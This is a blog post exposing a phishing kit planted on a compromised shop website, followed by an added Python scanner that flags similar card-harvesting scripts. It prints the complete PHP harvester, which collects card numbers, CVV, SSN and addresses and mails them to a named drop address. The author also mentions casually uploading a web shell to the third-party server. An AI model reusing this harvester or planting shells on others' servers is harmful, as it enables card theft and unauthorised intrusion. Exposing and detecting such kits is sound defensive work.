
Monday, November 3, 2014

Phishing - bristolbathroomstore.co.uk - Exposed

Today I just checked my spam mail and saw this mail:



It says that my card has been suspended and that an error deleted all information!! So I clicked the link and was moved to this page:


It wants all security info from me, including card number and PIN.
I entered some trash info and submitted it, then the script "Perfect.php" came into action and moved me to the Visa website. But let's take a look at the URL:

hxxp://www.bristolbathroomstore.co.uk/uploads/news/%20vbv.USA/your%20account/index.html 

Also, Visa moved to the "Bristol Bathroom Store" website, LOL.


Also, I put a shell on it just to look at the file "Perfect.php":


<?php
$ip = getenv("REMOTE_ADDR");
$J7 = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=$ip");
$CNCD = $J7->geoplugin_countryCode ; // Country
$STCD = $J7->geoplugin_regionCode ; //  State
$hostname = gethostbyaddr($ip);
$message .= "-----------------[ReZuLt]-------------------\n";
$message .= "First name                     : ".$_POST['nom']."\n";
$message .= "Last name                  : ".$_POST['nom0']."\n";
$message .= "Adress Line 1 : ".$_POST['address1']."\n";
$message .= "Adress Line 2 : ".$_POST['address2']."\n";
$message .= "Town/City : ".$_POST['city']."\n";
$message .= "Pastcode : ".$_POST['zip']."\n";
$message .= "Date dnaissance   : ".$_POST['l_civil0']."/".$_POST['l_civil1']."/".$_POST['l_civil2']."\n";
$message .= "Non d j f      : ".$_POST['adresse']."\n";
$message .= "Social Security Number : ".$_POST['ssn1']."/".$_POST['ssn2']."/".$_POST['ssn3']."\n";
$message .= "Type de carte  : ".$_POST['l_civil3']."\n";include 'Perfect/visa.css';
$message .= "numero carte   : ".$_POST['ccnum']."\n";
$message .= "Date d'expir   : ".$_POST['mois']."/".$_POST['annee']."\n";
$message .= "cvv2           :".$_POST['cvv2']."\n";
$message .= "---------------------------------------------\n";
$message .= "IP Address : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$timedate = $_POST['historys'];
$rnessage  = "$message\n";
$message .= "-------------------+ Created in 2014 [ Dj0ui ] +--------------------\n";
$send="mamine.boujneh@live.fr"; // 
$subject = "CC VBV ReZulT | Fallega |  ~>| $CNCD | $STCD | Fr0m $ip";
$headers = "From:Fallega~<mamine.boujneh@live.fr>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($send,$subject,$rnessage,$headers);
mail("mamine.boujneh@live.fr",$subject,$rnessage,$headers);
header("Location:  https://usa.visa.com/personal/security/vbv/index.html");
?>

All the data collected goes to his mail address. Also, if you enter it on Facebook, it gives you interesting information.
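For site owners who want to find a script like Perfect.php in their own uploads directory, here is a triage sketch. It is an added example, not part of the original post: it flags PHP files that read card fields from the form, mail them out, and redirect the visitor off-site. The field names come from the kit above; the sample files, hosts and addresses are constructed placeholders.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Field names are the ones the kit above reads from $_POST; extend for other kits.
SENSITIVE = re.compile(r"\$_POST\[\s*['\"](ccnum|cvv2?|ssn\d*|pin)['\"]\s*\]", re.I)
MAIL_CALL = re.compile(r"\bmail\s*\(", re.I)
REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:\s*(https?://[^'\"\s]+)", re.I)
PROFILING = re.compile(r"geoplugin\.net|REMOTE_ADDR|gethostbyaddr", re.I)
EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Constructed samples (not the kit from the post); hosts and addresses are placeholders.
SAMPLE_KIT = r'''<?php $ip = getenv("REMOTE_ADDR");
$message .= "card: ".$_POST['ccnum']." cvv: ".$_POST['cvv2'];
mail("drop@example.invalid", "result", $message);
header("Location:  https://brand.example/index.html"); ?>'''
SAMPLE_BENIGN = r'''<?php mail("sales@shop.example", "Contact", $_POST['comment']);
header("Location: https://www.shop.example/thanks.html"); ?>'''


def is_offsite(url, site_host):
    host = urlparse(url).hostname or ""
    return host != site_host and not host.endswith("." + site_host)


def triage_php(source, site_host):
    """Score one PHP file for the collect -> mail -> off-site redirect pattern."""
    fields = sorted({f.lower() for f in SENSITIVE.findall(source)})
    offsite = [u for u in REDIRECT.findall(source) if is_offsite(u, site_host)]
    hits = {"reads_card_fields": bool(fields), "calls_mail": bool(MAIL_CALL.search(source)),
            "redirects_offsite": bool(offsite), "profiles_visitor": bool(PROFILING.search(source))}
    return {
        "score": sum(hits.values()),
        # Card data read from the form and then mailed out is the decisive pair.
        "suspicious": hits["reads_card_fields"] and hits["calls_mail"],
        "fields": fields, "offsite_redirects": offsite,
        "drop_addresses": sorted(set(EMAIL.findall(source))),  # useful for abuse reports
    }


def scan_tree(root, site_host):
    """Return {path: report} for each suspicious .php file under root."""
    found = ((str(p), triage_php(p.read_text(errors="replace"), site_host))
             for p in sorted(Path(root).rglob("*.php")))
    return {path: rep for path, rep in found if rep["suspicious"]}


if __name__ == "__main__":
    print(triage_php(SAMPLE_KIT, "shop.example"))
```

This is a heuristic: a match means the file deserves a manual look, and a kit that renames its fields will need the field list extended.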


